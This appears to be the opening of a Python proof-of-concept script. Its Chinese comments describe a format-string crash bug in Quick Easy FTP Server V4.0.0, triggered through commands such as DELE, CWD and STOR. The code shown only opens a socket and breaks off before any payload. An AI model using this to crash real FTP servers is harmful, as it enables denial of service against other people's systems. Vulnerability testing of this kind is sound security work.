# -*- coding: UTF-8 -*- #Quick Easy FTP Server是一款小型的FTP服务器。 #Quick Easy FTP Server V4.0.0版本存在拒格式化字符串漏洞。 #攻击者可输入#DELE、CWD、SIZE、STOR、RNFR、MKD或PASS命令时, #若参数包含格式化字符串将造成程序崩溃。 #测试方法是分别发送DELE、CWD、SIZE、STOR等命令观察服务器状态。
import socket s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((